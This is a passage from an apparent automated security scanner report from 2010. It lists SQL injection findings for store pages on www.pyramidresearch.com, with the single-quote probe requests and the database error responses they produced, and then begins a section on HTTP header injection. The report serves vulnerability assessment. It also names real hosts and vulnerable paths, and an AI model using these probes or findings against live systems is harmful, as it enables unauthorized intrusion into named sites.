Set-Cookie: ASPSESSIONIDQCSQBACR=GPKKIDJBGKOPFDLFDFDJDOEK; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>

1.64. http://www.pyramidresearch.com/store/RPMBAPPSTORE.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pyramidresearch.com
Path:   /store/RPMBAPPSTORE.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /store'/RPMBAPPSTORE.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:03:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=NBLKIDJBNHGBOBFNGGJMBDFB; path=/
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font>
...[SNIP]...

Request 2

GET /store''/RPMBAPPSTORE.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:03:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=ACLKIDJBELIPBAFOLDDBDKOM; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>

1.65. http://www.pyramidresearch.com/store/RPMBPAYMENT.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pyramidresearch.com
Path:   /store/RPMBPAYMENT.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /store'/RPMBPAYMENT.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:03:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=JCLKIDJBFFCGCCJPDPBNEOCP; path=/
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font>
...[SNIP]...

Request 2

GET /store''/RPMBPAYMENT.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:03:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=MCLKIDJBLMAIJFLLPOIEFFHL; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>

1.66. http://www.pyramidresearch.com/store/RPMobileEnterpriseServices.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pyramidresearch.com
Path:   /store/RPMobileEnterpriseServices.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /store'/RPMobileEnterpriseServices.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:03:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=CDLKIDJBJKJDFEMJMDIPNNBJ; path=/
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font>
...[SNIP]...

Request 2

GET /store''/RPMobileEnterpriseServices.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:03:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=EDLKIDJBFDJKFCPNANPKCMHE; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>

1.67. http://www.pyramidresearch.com/store/RPPREPMOBSERV.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pyramidresearch.com
Path:   /store/RPPREPMOBSERV.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /store'/RPPREPMOBSERV.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:03:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=DELKIDJBIHGFDACPGCMJLBKE; path=/
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font>
...[SNIP]...

Request 2

GET /store''/RPPREPMOBSERV.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:03:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=EELKIDJBMNKKLNNNJJOGMJCP; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>

1.68. http://www.pyramidresearch.com/store/RPWiMAXandLTE.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pyramidresearch.com
Path:   /store/RPWiMAXandLTE.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /store'/RPWiMAXandLTE.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:03:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=CFLKIDJBICMJLIHJHKEIKGPP; path=/
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font>
...[SNIP]...

Request 2

GET /store''/RPWiMAXandLTE.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:03:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=EFLKIDJBCBILODGLKBMCGBGF; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>

1.69. http://www.pyramidresearch.com/store/ins_ame_100930.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pyramidresearch.com
Path:   /store/ins_ame_100930.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /store'/ins_ame_100930.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=BJMKIDJBGCKOKCIKMODHDMKD; path=/
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font>
...[SNIP]...

Request 2

GET /store''/ins_ame_100930.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=DJMKIDJBKJEEDCLDEJDBONIA; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>

1.70. http://www.pyramidresearch.com/store/ins_ame_101117.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pyramidresearch.com
Path:   /store/ins_ame_101117.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /store'/ins_ame_101117.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:03:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=GILKIDJBCCNINELBFIFKENLC; path=/
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font>
...[SNIP]...

Request 2

GET /store''/ins_ame_101117.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:03:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=JILKIDJBJCCBEGJIFPFOOBCD; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>

1.71. http://www.pyramidresearch.com/store/ins_ap_101105.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pyramidresearch.com
Path:   /store/ins_ap_101105.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /store'/ins_ap_101105.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:03:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=APLKIDJBHGKMFLDAGFOPBCIL; path=/
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font>
...[SNIP]...

Request 2

GET /store''/ins_ap_101105.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:03:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=CPLKIDJBEGOOBELBNNJFJEDN; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>

1.72. http://www.pyramidresearch.com/store/ins_eur_101025.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pyramidresearch.com
Path:   /store/ins_eur_101025.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /store'/ins_eur_101025.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=IFMKIDJBOBBACJOLFGMCLHOO; path=/
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font>
...[SNIP]...

Request 2

GET /store''/ins_eur_101025.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=LFMKIDJBGFJMICBFCJEGCDNK; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>

1.73. http://www.pyramidresearch.com/store/ins_la_101005.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pyramidresearch.com
Path:   /store/ins_la_101005.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /store'/ins_la_101005.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=FEMKIDJBEKNKELOCOLCEFOML; path=/
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font>
...[SNIP]...

Request 2

GET /store''/ins_la_101005.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=MEMKIDJBAHHNMMNFPJGBJHBA; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>

1.74. http://www.pyramidresearch.com/store/ins_la_101109.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pyramidresearch.com
Path:   /store/ins_la_101109.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /store'/ins_la_101109.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:03:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=MHLKIDJBNLNHJOBFJIIHKKON; path=/
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font>
...[SNIP]...

Request 2

GET /store''/ins_la_101109.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:03:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=NHLKIDJBHDNFFOJEBABLBNBE; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>

1.75. http://www.pyramidresearch.com/store/ins_la_101118.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pyramidresearch.com
Path:   /store/ins_la_101118.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /store'/ins_la_101118.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:03:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=JGLKIDJBCIEIJIJKMAAHNJAH; path=/
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font>
...[SNIP]...

Request 2

GET /store''/ins_la_101118.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:03:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=KGLKIDJBKGBDJGEFJNGGOGDG; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>

1.76. http://www.pyramidresearch.com/store/ins_la_101124.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pyramidresearch.com
Path:   /store/ins_la_101124.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /store'/ins_la_101124.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:03:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=HELKIDJBCEPCMGLFIBJIODNP; path=/
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font>
...[SNIP]...

Request 2

GET /store''/ins_la_101124.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:03:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=KELKIDJBOFNGFIAAAPJLNGJJ; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>

1.77. http://www.pyramidresearch.com/store/shopping_cart.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pyramidresearch.com
Path:   /store/shopping_cart.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /store'/shopping_cart.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:03:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=PIKKIDJBMHKCHJPNDILBHLKB; path=/
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font>
...[SNIP]...

Request 2

GET /store''/shopping_cart.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:03:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=AJKKIDJBDEKNOGBMMJNLCENO; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>

2. HTTP header injection  previous  next
There are 8 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp [eyeblaster cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerRedirect.asp

Issue detail

